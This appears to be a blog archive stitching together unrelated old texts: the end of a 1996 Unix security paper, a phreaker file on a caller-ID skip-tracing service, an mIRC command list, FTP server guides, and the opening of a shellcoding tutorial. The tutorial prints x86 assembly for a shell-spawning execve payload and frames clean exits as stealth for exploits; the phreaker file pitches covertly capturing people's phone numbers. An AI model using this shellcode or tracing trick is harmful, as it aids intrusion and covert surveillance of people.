INFOSEC AWARENESS OFFICE
National Computer Security Center
9800 Savage Road
Fort George G. Meader, MD 20755-600

We other just have to read the papers on the World Wide Web. Every
paper can not however be found on the Internet.

(2) "Improving the security of your Unix system" by Curry is also very
nice if you need the very basic things. If you don't now anything about
computer security you can't find a better start.

(3) "The WWW security FAQ" by Stein is although it deal with W3-security
the very best better on the Internet about computer security.

(4) CERT have aklso published several good papers, for example:

- Anonymous FTP Abuses.
- Email Bombing and Spamming.
- Spoofed/Forged Email.
- Protecting yourself from password file attacks.

I think however that the last paper have overlooked several things.

(5) For a long list on papers I can recommend:
"FAQ: Computer Security Frequently Asked Questions".

(6) Also see section ".G. SUGGESTED READING"

You should also get some big good commercial book, but I don't want
to recommend any.

.F.2. MONITORING PERFORMANCE
----------------------------

.F.2.1. INTRODUCTION
--------------------

There is several commands and services that can be used for
monitoring performance. And at least two good free programs can
be found on Internet.

.F.2.2. COMMANDS AND SERVICES
-----------------------------

For more information read the man text.

netstat Show network status.
nfsstat Show NFS statistics.
sar System activity reporter.
vmstat Report virtual memory statistics.
timex Time a command, report process data and system
activity.
time Time a simple command.
truss Trace system calls and signals.
uptime Show how long the system has been up.

Note that if a public netstat server can be found you might be able
to use netstat from the outside. netstat can also give information
like tcp sequence numbers and much more.

.F.2.3. PROGRAMS
----------------

Proctool: Proctool is a freely available tool for Solaris that monitors
and controls processes.
ftp://opcom.sun.ca/pub/binaries/

Top: Top might be a more simple program than Proctool, but is
good enough.

.F.2.4. ACCOUNTING
------------------

To monitor performance you have to collect information over a long
period of time. All Unix systems have some sort of accounting logs
to identify how much CPU time, memory each program uses. You should
check your manual to see how to set this up.

You could also invent your own account system by using crontab and
a script with the commands you want to run. Let crontab run the script
every day and compare the information once a week. You could for
example let the script run the following commands:

- netstat
- iostat -D
- vmstat

.G. SUGGESTED READING
~~~~~~~~~~~~~~~~~~~~~

.F.1. INFORMATION FOR DEEPER KNOWLEDGE
-------------------------------------

(1) Hedrick, C. Routing Information Protocol. RFC 1058, 1988.
(2) Mills, D.L. Exterior Gateway Protocol Formal Specification. RFC 904, 1984.
(3) Postel, J. Internet Control Message Protocol. RFC 792, 1981.
(4) Harrenstien, K. NAME/FINGER Protocol, RFC 742, 1977.
(5) Sollins, K.R. The TFTP Protocol, RFC 783, 1981.
(6) Croft, W.J. Bootstrap Protocol, RFC 951, 1985.

Many of the papers in this category was RFC-papers. A RFC-paper
is a paper that describes a protocol. The letters RCS stands for
Request For Comment. Hosts on the Internet are expected to understand
at least the common ones. If you want to learn more about a protocol
it is always good to read the proper RFC. You can find a nice sRFC
index search form at URL:

http://pubweb.nexor.co.uk/public/rfc/index/rfc.html

.F.2. KEEPING UP TO DATE INFORMATION
------------------------------------

(1) CERT mailing list. Send an e-mail to cert@cert.org to be placed
on the list.
(2) Bugtraq mailinglist. Send an e-mail to bugtraq-request@fc.net.
(3) WWW-security mailinglist. Send an e-mail to www-security@ns2.rutgers.edu.
(4) Sun Microsystems Security Bulletins.
(5) Various articles from: - comp.security.announce
- comp.security.unix
- comp.security.firewalls
(6) Varius 40Hex Issues.

.F.3. BASIC INFORMATION
-----------------------

(1) Husman, H. INTRODUKTION TILL DATASÄKERHET UNDER X-WINDOWS, 1995.
(2) Husman, H. INTRODUKTION TILL IP-SPOOFING, 1995.
(3) The following rainbow books: - Teal Green Book (Glossary of
Computer Security Terms).
- Bright Orange Book( A Guide
to Understanding Security Testing
and Test Documentation in Trusted
Systems).
- C1 Technical Report-001
(Computer Viruses: Preventation,
Detection, and Treatment).
(4) Ranum, Marcus. Firewalls, 1993.
(5) Sun Microsystems, OpenWindows V3.0.1. User Commands, 1992.
(6) Husman, H. ATT SPÅRA ODOKUMENTERADE SÄKERHETSLUCKOR, 1996.
(7) Dark OverLord, Unix Cracking Tips, 1989.
(8) Shooting Shark, Unix Nasties, 1988.
(9) LaDue, Mark.D. Hostile Applets on the Horizone, 1996.
(10) Curry, D.A. Improving the security of your unix system, 1990.
(11) Stein, L.D. The World Wide Web security FAQ, 1995.
(12) Bellovin, S.M. Security Problems in the TCP/IP Protocol, 1989.

.H. COPYRIHT
------------

This paper is Copyright (c) 1996 by Hans Husman.

Permission is hereby granted to give away free copies electronically. You
may distribute, transfer, or spread this paper electronically. You may not
pretend that you wrote it. This copyright notice must be maintained in any
copy made. If you wish to reprint the whole or any part of this paper in any
other medium excluding electronic medium, please ask the author for
permission.

.I. DISCLAIMER
--------------

The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are
NO warranties with regard to this information. In no event shall the author
be liable for any damages whatsoever arising out of or in connection with
the use or spread of this information. Any use of this information is at the
user's own risk.

An Introduction into TeleScan

2009-11-03T02:38:00.000-08:00

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%% %%% tm %%%
%%% %%%%%%% %%%%%%% %%% %%%%% %%%%% %%% %%%%%% %%%
%%% %%% %%% %%% % %%% %%% %%% %%%
%%% %%% %%%%%%% %%% %%% %%%% %%% %%% %%% %%% %%% %%%
%%% %%% %%% %%% %%% %%% % %%% %%% %%% %%% %%%
%%% %%% %%%%%%% %%%%%%% %%%%% %%%%% %%%%%%%%%%% %%% %%% %%%
%%% %%% %%%
%%% The Ultimate Skip Tracing Weapon %%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% 14-Feb-94 %%%%
INTRODUCTION
Whats all the hoopla? Well I've been trying to find a good ANI demo ever
since IIRG's went down at the first of the year [800-852-9932]. Well I
finally got one from The Mortician. Here it is...
8 0 0 . 7 7 5 . 5 5 1 3
This is an ANI demo provided by a security company called TEL-SCAN(tm). Now
ANI is cool and useful and everything, but it isn't hardly worthy of one of
my wonderful headers. But see, theres more at stake here. Call the demo and
get the ANI info and all that, and if you're a lamer stop there. But if
you're kK00l enough, stay on the line and find out more about TEL-SCAN(tm),
the company providing the demo.
THE TEL-SCAN(tm) NETWORK
TEL-SCAN(tm) is a Colorado based Security service that offers an improvised
skip-tracing method to Private Investigators, (or anyone with money and a
good MO). How it works is this: subscribers are provided with an 800
"Identifier Line" which when called automatically identifies the incoming
number and records it into a corresponding Voice Mail Box. The subscriber can
then call the Mail Box and it will relay to him all incoming calls to the
"Identifier Line". 2-o0 pH_ukYn / hand are endless!!!
TEL-SCAN(tm) can be used as such: Get a bunch of business cards printed with
the "Identifier Line" printed as your phone number. If you're looking for
someone, leave your card around places where they're likely to get it. When
they call, you've got the number they're calling from and possibly an
important lead. Viola! Skip-Tracing improvised. No this of course is
constitutes intended use. As far as underground use goes...well...you know.
TEL-SCAN(tm) GEOGRAPHICALS
For more information on TEL-SCAN(tm) write or call::
TEL-SCAN(tm)
2641 North Taft
Loveland, CO 80538
Number: 303.663.1703
FAX: 303.663.1708
By the way when you call, you will be asked where you heard about TEL-
SCAN(tm). DO NOT say you heard it from me (duh)! Have a good one ready
because they will hang up on you if they think something is funny.
TEL-SCAN(tm) PRICES
This service has a one time activation fee of $67.00 dollars. Thereafter you
are charged $5.00 dollars everytime the service identifies a number for you.
You are billed monthly if applicable, but there are no mandatory monthly
fees. Now here's the good part: you can subscribe to the service via FAXed
licensing agreement at which time you will IMMEDIATLEY be issued a Mail Box
and a "Line Identifier". They will bill you later for the activation fee. Not
to shabby huh?
OUTRODUCTION
Well thats it, and thanks again to The Mortician at Lies, Hate, and Deception
(LHD·) for this one. Look for other oB files (with great headers) labeled as
xxxxxxxx.oB. These files can be found at...
.%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%.%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%.
.% oleBuzzard's kn0wledge phreak %.% sUmthyn lykE 4000+ text fylez %.
.% AC 303.382.5968--NUP = NO NUP %.% hAck/phrEAk/AnArky/vIrII/cArd %.
.% 24oo-14.4ooKiloBaud-Open 24/7 %.% n0 phUckyn lAmEr wArEz do0dz! %.
.%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%.%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%.

All mIRC Commands

2009-11-03T02:35:00.001-08:00

All mIRC Commands

/ Recalls the previous command entered in the current window.
/! Recalls the last command typed in any window.
/action {action text} Sends the specifed action to the active channel or query window.
/add [-apuce] {filename.ini} Loads aliases, popups, users, commands, and events.
/ame {action text} Sends the specifed action to all channels which you are currently on.
/amsg {text} Sends the specifed message to all channels which you are currently on.
/auser {level} {nick|address} Adds a user with the specified access level to the remote users
list.
/auto [on|off|nickname|address] Toggles auto-opping of a nick or address or sets it on or off
totally.
/away {away message} Sets you away leave a message explaining that you are not currently paying
attention to IRC.
/away Sets you being back.
/ban [#channel] {nickname} [type] Bans the specified nick from the curent or given channel.
/beep {number} {delay} Locally beeps 'number' times with 'delay' in between the beeps. /channel
Pops up the channel central window (only works in a channel).
/clear Clears the entire scrollback buffer of the current window.
/ctcp {nickname} {ping|finger|version|time|userinfo|clientinfo} Does the given ctcp request on
nickname.
/closemsg {nickname} Closes the query window you have open to the specified nick.
/creq [ask | auto | ignore] Sets your DCC 'On Chat request' settings in DCC/Options.
/dcc send {nickname} {file1} {file2} {file3} ... {fileN} Sends the specified files to nick.
/dcc chat {nickname} Opens a dcc window and sends a dcc chat request to nickname.
/describe {#channel} {action text} Sends the specifed action to the specified channel window.
/dde [-r] {service} {topic} {item} [data] Allows DDE control between mIRC and other
applications.
/ddeserver [on [service name] | off] To turn on the DDE server mode, eventually with a given
service name.
/disable {#groupname} De-activates a group of commands or events.
/disconnect Forces a hard and immediate disconnect from your IRC server. Use it with care.
/dlevel {level} Changes the default user level in the remote section.
/dns {nickname | IP address | IP name} Uses your providers DNS to resolve an IP address.
/echo [nickname|#channel|status] {text} Displays the given text only to YOU on the given place
in color N.
/enable {#groupname} Activates a group of commands or events.
/events [on|off] Shows the remote events status or sets it to listening or not.
/exit Forces mIRC to closedown and exit.
/finger Does a finger on a users address.
/flood [{numberoflines} {seconds} {pausetime}] Sets a crude flood control method.
/fsend [on|off] Shows fsends status and allows you to turn dcc fast send on or off.
/fserve {nickname} {maxgets} {homedirectory} [welcome text file] Opens a fileserver.
/guser {level} {nick} [type] Adds the user to the user list with the specified level and
address type.
/help {keyword} Brings up the Basic IRC Commands section in the mIRC help file.
/ignore [on|off|nickname|address] Toggles ignoring of a nick or address or sets it on or off
totally.
/invite {nickname} {#channel} Invites another user to a channel.
/join {#channel} Makes you join the specified channel.
/kick {#channel} {nickname} Kicks nickname off a given channel.
/list [#string] [-min #] [-max #] Lists all currently available channels, evt. filtering for
parameters.
/log [on|off] Shows the logging status or sets it on or off for the current window.
/me {action text} Sends the specifed action to the active channel or query window.
/mode {#channel|nickname} [[+|-]modechars [parameters]] Sets channel or user modes.
/msg {nickname} {message} Send a private message to this user without opening a query window.
/names {#channel} Shows the nicks of all people on the given channel.
/nick {new nickname} Changes your nickname to whatever you like.
/notice {nick} {message} Send the specified notice message to the nick.
/notify [on|off|nickname] Toggles notifying you of a nick on IRC or sets it on or off totally.
/onotice [#channel] {message} Send the specified notice message to all channel ops.
/omsg [#channel] {message} Send the specified message to all ops on a channel.
/part {#channel} Makes you leave the specified channel.
/partall Makes you leave all channels you are on.
/ping {server address} Pings the given server. NOT a nickname.
/play [-c] {filename} [delay] Allows you to send text files to a window.
/pop {delay} [#channel] {nickname} Performs a randomly delayed +o on a not already opped nick.
/protect [on|off|nickname|address] Toggles protection of a nick or address or sets it on or off
totally.
/query {nickname} {message} Open a query window to this user and send them the private message.
/quit [reason] Disconnect you from IRC with the optional byebye message.
/raw {raw command} Sends any raw command you supply directly to the server. Use it with care!!
/remote [on|off] Shows the remote commands status or sets it to listening or not.
/rlevel {access level} Removes all users from the remote users list with the specified access
level.
/run {c:\path\program.exe} [parameters] Runs the specified program, evt. with parameters.
/ruser {nick[!]|address} [type] Removes the user from the remote users list.
/save {filename.ini} Saves remote sections into a specified INI file.
/say {text} Says whatever you want to the active window.
/server [server address [port] [password]] Reconnects to the previous server or a newly
specified one.
/sound [nickname|#channel] {filename.wav} {action text} Sends an action and a fitting sound.
/speak {text} Uses the external text to speech program Monologue to speak up the text.
/sreq [ask | auto | ignore] Sets your DCC 'On Send request' settings in DCC/Options.
/time Tells you the time on the server you use.
/timer[N] {repetitions} {interval in seconds} {command} [| {more commands}] Activates a timer.
/topic {#channel} {newtopic} Changes the topic for the specified channel.
/ulist [{|}]{level} Lists all users in the remote list with the specified access levels.
/url [-d] Opens the URL windows that allows you to surf the www parallel to IRC.
/uwho [nick] Pops up the user central with information about the specified user.
/who {#channel} Shows the nicks of all people on the given channel.
/who {*address.string*} Shows all people on IRC with a matching address.
/whois {nickname} Shows information about someone in the status window.
/whowas {nickname} Shows information about someone who -just- left IRC.
/wavplay {c:\path\sound.wav} Locally plays the specified wave file.
/write [-cidl] {filename} [text] To write the specified text to a .txt file.

MoViEBoT #xdcc-help /server irc.atomic-irc.net

We strive to make IRC easier for you!

All about ftp must read

2009-11-03T02:29:00.002-08:00

Setting Up A Ftp:

Well, since many of us have always wondered this, here it is. Long and drawn out. Also, before attempting this, realize one thing; You will have to give up your time, effort, bandwidth, and security to have a quality ftp server.
That being said, here it goes. First of all, find out if your IP (Internet Protocol) is static (not changing) or dynamic (changes everytime you log on). To do this, first consider the fact if you have a dial up modem. If you do, chances are about 999 999 out of 1 000 000 that your IP is dynamic. To make it static, just go to a place like h*tp://www.myftp.org/ to register for a static ip address.

You'll then need to get your IP. This can be done by doing this:
Going to Start -> Run -> winipcfg or www.ask.com and asking 'What is my IP?'

After doing so, you'll need to download an FTP server client. Personally, I'd recommend G6 FTP Server, Serv-U FTPor Bullitproof v2.15 all three of which are extremely reliable, and the norm of the ftp world.
You can download them on this site: h*tp://www.liaokai.com/softw_en/d_index.htm

First, you'll have to set up your ftp. For this guide, I will use step-by-step instructions for G6. First, you'll have to go into 'Setup -> General'. From here, type in your port # (default is 21). I recommend something unique, or something a bit larger (ex: 3069). If you want to, check the number of max users (this sets the amount of simultaneous maximum users on your server at once performing actions - The more on at once, the slower the connection and vice versa).

The below options are then chooseable:
-Launch with windows
-Activate FTP Server on Start-up
-Put into tray on startup
-Allow multiple instances
-Show "Loading..." status at startup
-Scan drive(s) at startup
-Confirm exit

You can do what you want with these, as they are pretty self explanatory. The scan drive feature is nice, as is the 2nd and the last option. From here, click the 'options' text on the left column.

To protect your server, you should check 'login check' and 'password check', 'Show relative path (a must!)', and any other options you feel you'll need. After doing so, click the 'advanced' text in the left column. You should then leave the buffer size on the default (unless of course you know what you're doing ), and then allow the type of ftp you want.

Uploading and downloading is usually good, but it's up to you if you want to allow uploads and/or downloads. For the server priority, that will determine how much conventional memory will be used and how much 'effort' will go into making your server run smoothly.

Anti-hammering is also good, as it prevents people from slowing down your speed. From here, click 'Log Options' from the left column. If you would like to see and record every single command and clutter up your screen, leave the defaults.

But, if you would like to see what is going on with the lowest possible space taken, click 'Screen' in the top column. You should then check off 'Log successful logins', and all of the options in the client directry, except 'Log directory changes'. After doing so, click 'Ok' in the bottom left corner.

You will then have to go into 'Setup -> User Accounts' (or ctrl & u). From here, you should click on the right most column, and right click. Choose 'Add', and choose the username(s) you would like people to have access to.

After giving a name (ex: themoonlanding), you will have to give them a set password in the bottom column (ex: wasfaked). For the 'Home IP' directory, (if you registered with a static server, check 'All IP Homes'. If your IP is static by default, choose your IP from the list. You will then have to right click in the very center column, and choose 'Add'.

From here, you will have to set the directory you want the people to have access to. After choosing the directory, I suggest you choose the options 'Read', 'List', and 'Subdirs', unless of course you know what you're doing . After doing so, make an 'upload' folder in the directory, and choose to 'add' this folder seperately to the center column. Choose 'write', 'append', 'make', 'list', and 'subdirs'. This will allow them to upload only to specific folders (your upload folder).

Now click on 'Miscellaneous' from the left column. Choose 'enable account', your time-out (how long it takes for people to remain idle before you automatically kick them off), the maximum number of users for this name, the maximum number of connections allowed simultaneously for one ip address, show relative path (a must!), and any other things at the bottom you'd like to have. Now click 'Ok'.
**Requested**

From this main menu, click the little boxing glove icon in the top corner, and right click and unchoose the hit-o-meter for both uploads and downloads (with this you can monitor IP activity). Now click the lightning bolt, and your server is now up and running.

Post your ftp info, like this:

213.10.93.141 (or something else, such as: 'f*p://example.getmyip.com')

User: *** (The username of the client)

Pass: *** (The password)

Port: *** (The port number you chose)

So make a FTP and join the FTP section

Listing The Contents Of A Ftp:

Listing the content of a FTP is very simple.
You will need FTP Content Maker, which can be downloaded from here:
ht*p://www.etplanet.com/download/application/FTP%20Content%20Maker%201.02.zip

1. Put in the IP of the server. Do not put "ftp://" or a "/" because it will not work if you do so.
2. Put in the port. If the port is the default number, 21, you do not have to enter it.
3. Put in the username and password in the appropriate fields. If the login is anonymous, you do not have to enter it.
4. If you want to list a specific directory of the FTP, place it in the directory field. Otherwise, do not enter anything in the directory field.
5. Click "Take the List!"
6. After the list has been taken, click the UBB output tab, and copy and paste to wherever you want it.

If FTP Content Maker is not working, it is probably because the server does not utilize Serv-U Software.

If you get this error message:
StatusCode = 550
LastResponse was : 'Unable to open local file test-ftp'
Error = 550 (Unable to open local file test-ftp)
Error = Unable to open local file test-ftp = 550
Close and restart FTP Content Maker, then try again.

error messages:

110 Restart marker reply. In this case, the text is exact and not left to the particular implementation; it must read: MARK yyyy = mmmm Where yyyy is User-process data stream marker, and mmmm server's equivalent marker (note the spaces between markers and "=").
120 Service ready in nnn minutes.
125 Data connection already open; transfer starting.
150 File status okay; about to open data connection.
200 Command okay.
202 Command not implemented, superfluous at this site.
211 System status, or system help reply.
212 Directory status.
213 File status.
214 Help message. On how to use the server or the meaning of a particular non-standard command. This reply is useful only to the human user.
215 NAME system type. Where NAME is an official system name from the list in the Assigned Numbers document.
220 Service ready for new user.
221 Service closing control connection. Logged out if appropriate.
225 Data connection open; no transfer in progress.
226 Closing data connection. Requested file action successful (for example, file transfer or file abort).
227 Entering Passive Mode (h1,h2,h3,h4,p1,p2).
230 User logged in, proceed.
250 Requested file action okay, completed.
257 "PATHNAME" created.
331 User name okay, need password.
332 Need account for login.
350 Requested file action pending further information.
421 Too many users logged to the same account
425 Can't open data connection.
426 Connection closed; transfer aborted.
450 Requested file action not taken. File unavailable (e.g., file busy).
451 Requested action aborted: local error in processing.
452 Requested action not taken. Insufficient storage space in system.
500 Syntax error, command unrecognized. This may include errors such as command line too long.
501 Syntax error in parameters or arguments.
502 Command not implemented.
503 Bad sequence of commands.
504 Command not implemented for that parameter.
530 Not logged in.
532 Need account for storing files.
550 Requested action not taken. File unavailable (e.g., file not found, no access).
551 Requested action aborted: page type unknown.
552 Requested file action aborted. Exceeded storage allocation (for current directory or dataset).
553 Requested action not taken. File name not allowed.

Active FTP vs. Passive FTP, a Definitive Explanation

Introduction
One of the most commonly seen questions when dealing with firewalls and other Internet connectivity issues is the difference between active and passive FTP and how best to support either or both of them. Hopefully the following text will help to clear up some of the confusion over how to support FTP in a firewalled environment.

This may not be the definitive explanation, as the title claims, however, I've heard enough good feedback and seen this document linked in enough places to know that quite a few people have found it to be useful. I am always looking for ways to improve things though, and if you find something that is not quite clear or needs more explanation, please let me know! Recent additions to this document include the examples of both active and passive command line FTP sessions. These session examples should help make things a bit clearer. They also provide a nice picture into what goes on behind the scenes during an FTP session. Now, on to the information...

The Basics
FTP is a TCP based service exclusively. There is no UDP component to FTP. FTP is an unusual service in that it utilizes two ports, a 'data' port and a 'command' port (also known as the control port). Traditionally these are port 21 for the command port and port 20 for the data port. The confusion begins however, when we find that depending on the mode, the data port is not always on port 20.

Active FTP
In active mode FTP the client connects from a random unprivileged port (N > 1024) to the FTP server's command port, port 21. Then, the client starts listening to port N+1 and sends the FTP command PORT N+1 to the FTP server. The server will then connect back to the client's specified data port from its local data port, which is port 20.

From the server-side firewall's standpoint, to support active mode FTP the following communication channels need to be opened:

FTP server's port 21 from anywhere (Client initiates connection)
FTP server's port 21 to ports > 1024 (Server responds to client's control port)
FTP server's port 20 to ports > 1024 (Server initiates data connection to client's data port)
FTP server's port 20 from ports > 1024 (Client sends ACKs to server's data port)

In step 1, the client's command port contacts the server's command port and sends the command PORT 1027. The server then sends an ACK back to the client's command port in step 2. In step 3 the server initiates a connection on its local data port to the data port the client specified earlier. Finally, the client sends an ACK back as shown in step 4.

The main problem with active mode FTP actually falls on the client side. The FTP client doesn't make the actual connection to the data port of the server--it simply tells the server what port it is listening on and the server connects back to the specified port on the client. From the client side firewall this appears to be an outside system initiating a connection to an internal client--something that is usually blocked.

Active FTP Example
Below is an actual example of an active FTP session. The only things that have been changed are the server names, IP addresses, and user names. In this example an FTP session is initiated from testbox1.slacksite.com (192.168.150.80), a linux box running the standard FTP command line client, to testbox2.slacksite.com (192.168.150.90), a linux box running ProFTPd 1.2.2RC2. The debugging (-d) flag is used with the FTP client to show what is going on behind the scenes. Everything in red is the debugging output which shows the actual FTP commands being sent to the server and the responses generated from those commands. Normal server output is shown in black, and user input is in bold.

There are a few interesting things to consider about this dialog. Notice that when the PORT command is issued, it specifies a port on the client (192.168.150.80) system, rather than the server. We will see the opposite behavior when we use passive FTP. While we are on the subject, a quick note about the format of the PORT command. As you can see in the example below it is formatted as a series of six numbers separated by commas. The first four octets are the IP address while the second two octets comprise the port that will be used for the data connection. To find the actual port multiply the fifth octet by 256 and then add the sixth octet to the total. Thus in the example below the port number is ( (14*256) + 178), or 3762. A quick check with netstat should confirm this information.

testbox1: {/home/p-t/slacker/public_html} % ftp -d testbox2
Connected to testbox2.slacksite.com.
220 testbox2.slacksite.com FTP server ready.
Name (testbox2:slacker): slacker
---> USER slacker
331 Password required for slacker.
Password: TmpPass
---> PASS XXXX
230 User slacker logged in.
---> SYST
215 UNIX Type: L8
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
ftp: setsockopt (ignored): Permission denied
---> PORT 192,168,150,80,14,178
200 PORT command successful.
---> LIST
150 Opening ASCII mode data connection for file list.
drwx------ 3 slacker users 104 Jul 27 01:45 public_html
226 Transfer complete.
ftp> quit
---> QUIT
221 Goodbye.

Passive FTP
In order to resolve the issue of the server initiating the connection to the client a different method for FTP connections was developed. This was known as passive mode, or PASV, after the command used by the client to tell the server it is in passive mode.

In passive mode FTP the client initiates both connections to the server, solving the problem of firewalls filtering the incoming data port connection to the client from the server. When opening an FTP connection, the client opens two random unprivileged ports locally (N > 1024 and N+1). The first port contacts the server on port 21, but instead of then issuing a PORT command and allowing the server to connect back to its data port, the client will issue the PASV command. The result of this is that the server then opens a random unprivileged port (P > 1024) and sends the PORT P command back to the client. The client then initiates the connection from port N+1 to port P on the server to transfer data.

From the server-side firewall's standpoint, to support passive mode FTP the following communication channels need to be opened:

FTP server's port 21 from anywhere (Client initiates connection)
FTP server's port 21 to ports > 1024 (Server responds to client's control port)
FTP server's ports > 1024 from anywhere (Client initiates data connection to random port specified by server)
FTP server's ports > 1024 to remote ports > 1024 (Server sends ACKs (and data) to client's data port)

In step 1, the client contacts the server on the command port and issues the PASV command. The server then replies in step 2 with PORT 2024, telling the client which port it is listening to for the data connection. In step 3 the client then initiates the data connection from its data port to the specified server data port. Finally, the server sends back an ACK in step 4 to the client's data port.

While passive mode FTP solves many of the problems from the client side, it opens up a whole range of problems on the server side. The biggest issue is the need to allow any remote connection to high numbered ports on the server. Fortunately, many FTP daemons, including the popular WU-FTPD allow the administrator to specify a range of ports which the FTP server will use. See Appendix 1 for more information.

The second issue involves supporting and troubleshooting clients which do (or do not) support passive mode. As an example, the command line FTP utility provided with Solaris does not support passive mode, necessitating a third-party FTP client, such as ncftp.

With the massive popularity of the World Wide Web, many people prefer to use their web browser as an FTP client. Most browsers only support passive mode when accessing ftp:// URLs. This can either be good or bad depending on what the servers and firewalls are configured to support.

Passive FTP Example
Below is an actual example of a passive FTP session. The only things that have been changed are the server names, IP addresses, and user names. In this example an FTP session is initiated from testbox1.slacksite.com (192.168.150.80), a linux box running the standard FTP command line client, to testbox2.slacksite.com (192.168.150.90), a linux box running ProFTPd 1.2.2RC2. The debugging (-d) flag is used with the FTP client to show what is going on behind the scenes. Everything in red is the debugging output which shows the actual FTP commands being sent to the server and the responses generated from those commands. Normal server output is shown in black, and user input is in bold.

Notice the difference in the PORT command in this example as opposed to the active FTP example. Here, we see a port being opened on the server (192.168.150.90) system, rather than the client. See the discussion about the format of the PORT command above, in the Active FTP Example section.

testbox1: {/home/p-t/slacker/public_html} % ftp -d testbox2
Connected to testbox2.slacksite.com.
220 testbox2.slacksite.com FTP server ready.
Name (testbox2:slacker): slacker
---> USER slacker
331 Password required for slacker.
Password: TmpPass
---> PASS XXXX
230 User slacker logged in.
---> SYST
215 UNIX Type: L8
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> passive
Passive mode on.
ftp> ls
ftp: setsockopt (ignored): Permission denied
---> PASV
227 Entering Passive Mode (192,168,150,90,195,149).
---> LIST
150 Opening ASCII mode data connection for file list
drwx------ 3 slacker users 104 Jul 27 01:45 public_html
226 Transfer complete.
ftp> quit
---> QUIT
221 Goodbye.

Summary
The following chart should help admins remember how each FTP mode works:

Active FTP :
command : client >1024 -> server 21
data : client >1024 <- server 20

Passive FTP :
command : client >1024 -> server 21
data : client >1024 -> server >1024

A quick summary of the pros and cons of active vs. passive FTP is also in order:

Active FTP is beneficial to the FTP server admin, but detrimental to the client side admin. The FTP server attempts to make connections to random high ports on the client, which would almost certainly be blocked by a firewall on the client side. Passive FTP is beneficial to the client, but detrimental to the FTP server admin. The client will make both connections to the server, but one of them will be to a random high port, which would almost certainly be blocked by a firewall on the server side.

Luckily, there is somewhat of a compromise. Since admins running FTP servers will need to make their servers accessible to the greatest number of clients, they will almost certainly need to support passive FTP. The exposure of high level ports on the server can be minimized by specifying a limited port range for the FTP server to use. Thus, everything except for this range of ports can be firewalled on the server side. While this doesn't eliminate all risk to the server, it decreases it tremendously.

Advanced Shellcoding Techniques

2009-11-03T02:29:00.001-08:00

***********************************************
* *
* Advanced Shellcoding Techniques - by Darawk *
* *
***********************************************

Introduction

This paper assumes a working knowledge of basic shellcoding techniques, and x86 assembly, I will not rehash these in this paper. I hope to teach you some of the lesser known shellcoding techniques that I have picked up, which will allow you to write smaller and better shellcodes. I do not claim to have invented any of these techniques, except for the one that uses the div instruction.

The multiplicity of mul

This technique was originally developed by Sorbo of darkircop.net. The mul instruction may, on the surface, seem mundane, and it's purpose obvious. However, when faced with the difficult challenge of shrinking your shellcode, it proves to be quite useful. First some background information on the mul instruction itself.

mul performs an unsigned multiply of two integers. It takes only one operand, the other is implicitly specified by the %eax register. So, a common mul instruction might look something like this:

movl $0x0a,%eax
mul $0x0a

This would multiply the value stored in %eax by the operand of mul, which in this case would be 10*10. The result is then implicitly stored in EDX:EAX. The result is stored over a span of two registers because it has the potential to be considerably larger than the previous value, possibly exceeding the capacity of a single register(this is also how floating points are stored in some cases, as an interesting sidenote).

So, now comes the ever-important question. How can we use these attributes to our advantage when writing shellcode? Well, let's think for a second, the instruction takes only one operand, therefore, since it is a very common instruction, it will generate only two bytes in our final shellcode. It multiplies whatever is passed to it by the value stored in %eax, and stores the value in both %edx and %eax, completely overwriting the contents of both registers, regardless of whether it is necessary to do so, in order to store the result of the multiplication. Let's put on our mathematician hats for a second, and consider this, what is the only possible result of a multiplication by 0? The answer, as you may have guessed, is 0. I think it's about time for some example code, so here it is:

xorl %ecx,%ecx
mul %ecx

What is this shellcode doing? Well, it 0's out the %ecx register using the xor instruction, so we now know that %ecx is 0. Then it does a mul %ecx, which as we just learned, multiplies it's operand by the value in %eax, and then proceeds to store the result of this multiplication in EDX:EAX. So, regardless of %eax's previous contents, %eax must now be 0. However that's not all, %edx is 0'd now too, because, even though no overflow occurs, it still overwrites the %edx register with the sign bit(left-most bit) of %eax. Using this technique we can zero out three registers in only three bytes, whereas by any other method(that I know of) it would have taken at least six.

The div instruction

Div is very similar to mul, in that it takes only one operand and implicitly divides the operand by the value in %eax. Also like, mul it stores the result of the divide in %eax. Again, we will require the mathematical side of our brains to figure out how we can take advantage of this instruction. But first, let's think about what is normally stored in the %eax register. The %eax register holds the return value of functions and/or syscalls. Most syscalls that are used in shellcoding will return -1(on failure) or a positive value of some kind, only rarely will they return 0(though it does occur). So, if we know that after a syscall is performed, %eax will have a non-zero value, and that the instruction divl %eax will divide %eax by itself, and then store the result in %eax, we can say that executing the divl %eax instruction after a syscall will put the value 1 into %eax. So...how is this applicable to shellcoding? Well, their is another important thing that %eax is used for, and that is to pass the specific syscall that you would like to call to int $0x80. It just so happens that the syscall that corresponds to the value 1 is exit(). Now for an example:

xorl %ebx,%ebx
mul %ebx
push %edx
pushl $0x3268732f
pushl $0x6e69622f
mov %esp, %ebx
push %edx
push %ebx
mov %esp,%ecx
movb $0xb, %al #execve() syscall, doesn't return at all unless it fails, in which case it returns -1
int $0x80

divl %eax # -1 / -1 = 1
int $0x80

Now, we have a 3 byte exit function, where as before it was 5 bytes. However, there is a catch, what if a syscall does return 0? Well in the odd situation in which that could happen, you could do many different things, like inc %eax, dec %eax, not %eax anything that will make %eax non-zero. Some people say that exit's are not important in shellcode, because your code gets executed regardless of whether or not it exits cleanly. They are right too, if you really need to save 3 bytes to fit your shellcode in somewhere, the exit() isn't worth keeping. However, when your code does finish, it will try to execute whatever was after your last instruction, which will most likely produce a SIG ILL(illegal instruction) which is a rather odd error, and will be logged by the system. So, an exit() simply adds an extra layer of stealth to your exploit, so that even if it fails or you can't wipe all the logs, at least this part of your presence will be clear.

Unlocking the power of leal

The leal instruction is an often neglected instruction in shellcode, even though it is quite useful. Consider this short piece of shellcode.

xorl %ecx,%ecx
leal 0x10(%ecx),%eax

